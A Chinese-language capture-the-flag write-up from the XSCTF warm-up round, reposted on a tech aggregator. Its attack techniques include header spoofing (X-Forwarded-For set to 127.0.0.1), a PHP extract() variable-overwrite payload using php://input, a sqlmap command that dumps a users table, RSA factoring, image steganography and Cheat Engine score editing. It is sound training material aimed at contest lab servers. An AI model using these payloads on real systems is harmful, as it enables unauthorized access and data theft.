IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> XSCTF联合招新赛-热身赛(部分WP) -> 正文阅读

[PHP知识库]XSCTF联合招新赛-热身赛(部分WP)

由于没有多少时间答题,抽空在划水的时候做了一两道题目.比赛已经结束了24小时了。特把写的WP分享一下,欢迎各位大佬进行指点。

warm_up

只有虔诚的嘉心糖才能成功拿到flag
地址:43.248.98.206:10003
GET / HTTP/1.1
Host: 43.248.98.206:10003
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Referer:jiaran BiliBili
X-Forwarded-For:127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

hsctf{he1_hei_ran_r@n_w0_d3_rAn_Ran_00000000} 

在这里插入图片描述

头头是道

有一个清醒的头脑很重要
地址:43.248.98.206:10006
hsctf{Mast3rH0ssssT_dI@nQQ}

在这里插入图片描述

B45364

WVVoT2FtUkhXamRoUmxVeFRtcHNUMXBHT1V4aFYyeDVXVmRHUTJKSGVGTlpXREJMQ2c9PQo=

三次base64得到flag

hsctf{hU569Nd_KiiraaBllRa}

EZphp

我得想想怎么才能取而代之
地址:43.248.98.206:10005

打开页面发现php extract变量覆盖

 <?php
include 'flag.php';
extract($_GET);
if (isset($wsf)) {
    $xmm = trim(file_get_contents($zm));
    if ($xmm == $wsf) {  //通过传参?wsf=&zm= 绕过
        if (!empty($xlq)) {
            $xw = trim(file_get_contents($fn)); 
            if ($xlq === $xw) {	//通过php://input协议绕过

                echo "<p>$flag</p>";
            } else {
                echo '<p>no no no </p>';
            }
        } else 'You cant do that!!';
    } else {
        echo 'hacker!!';
    }
} else {
    highlight_file(__FILE__);
}
?>
payload: ?wsf=&zm=&xlq=fn=2&fn=php://input 
Post传参:fn=2

在这里插入图片描述

flag{phP_lS_th9_be5T_l4ngUa9e}

easy_sql

嘉然,为了你我要打ctf!!!咦?这里这么注入不进去呢?奇怪
地址:43.248.98.206:10001

访问之后查看加载发现 id=1
在这里插入图片描述

简单测试,发现sql注入
在这里插入图片描述

sqlmap一把梭哈。

#因为是时间盲注,所以flag出来之后就直接Ctrl+c了
python sqlmap.py -u "http://43.248.98.206:10001/image.php?id=*" -D hsctffinal -T users --dump

在这里插入图片描述

baigeiRSA

白给了,白给了,真白给!

下载下来之后的脚本内容

import libnum
from Crypto.Util import number
from secret import flag

size = 128
e = 65537
p = number.getPrime(size)
q = number.getPrime(size)
n = p*q

m = libnum.s2n(flag)
c = pow(m, e, n)

print('n = %d' % n)
print('c = %d' % c)


#同时还有一个输出文件
n = 88503001447845031603457048661635807319447136634748350130947825183012205093541
c = 40876621398366534035989065383910105526025410999058860023908252093679681817257
在已知e,N,c的情况下,其他不管了,直接yafu分解N,得到p,q 如下
P39 = 322368694010594584041053487661458382819
P39 = 274539690398523616505159415195049044439

在这里插入图片描述

直接脚本,网上脚本,不过原脚本有问题,然后稍作修改,删除了没有用的代码.结果如下

import gmpy2
from Crypto.Util.number import long_to_bytes

e=65537
c=40876621398366534035989065383910105526025410999058860023908252093679681817257
p = 322368694010594584041053487661458382819
q = 274539690398523616505159415195049044439
n = p*q
phi_n = (p-1)*(q-1)
d = gmpy2.invert(e,phi_n)
m = pow(c,d,n)
print(long_to_bytes(m))

得到flag

HSCTF{@Zh3n_Ba1_G3i!@}

在这里插入图片描述

image1

图片隐写1

下载下来图片,右键属性,在详细信息中发现flag

在这里插入图片描述

image2

图片隐写2

比第一张图要大,猜测图片内插入了其他数据。

在这里插入图片描述
但是内容一样,主题部分无flag。直接查看16进制,疑似被隐藏。搜索flag
在这里插入图片描述

发现flag
flag{5eafbba3-f710-4fcc-9045-0b0a8b581ec5}

在这里插入图片描述

image3

之前两个图片占用40k左右.这个图片占用755k.明显不正常

在这里插入图片描述

同时图片存在白边,疑似高度存在问题

在这里插入图片描述

修改高度后获取flag

flag{2c44e767-e9b4-4b55-b75e-3504b515942f}

在这里插入图片描述
在这里插入图片描述

image4

大小无异常,但是在16进制中搜索flag发现了第二题的flag,提交失败,在最后发现了zip的内容。存在flag.txt
在这里插入图片描述

直接修改后缀为zip,然后打开,获取flag.txt内容

flag{3f0283e0-e5d0-4084-816b-1237718a8630}

在这里插入图片描述

2^11

^在sage里又是什么意思呢……?

下载附件后,运行exe,发现是2048

在这里插入图片描述

逆向不太会,ida分析半天,伪代码调不出来,于是决定上下科技。

通过CE修改分数,直接显示flag
在这里插入图片描述

flag{E1d3sTBrOth3r_CaR0Ilikoule}

在这里插入图片描述

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章           查看所有文章
加:2022-10-31 11:33:57  更:2022-10-31 11:35:22 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/22 19:09:35-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码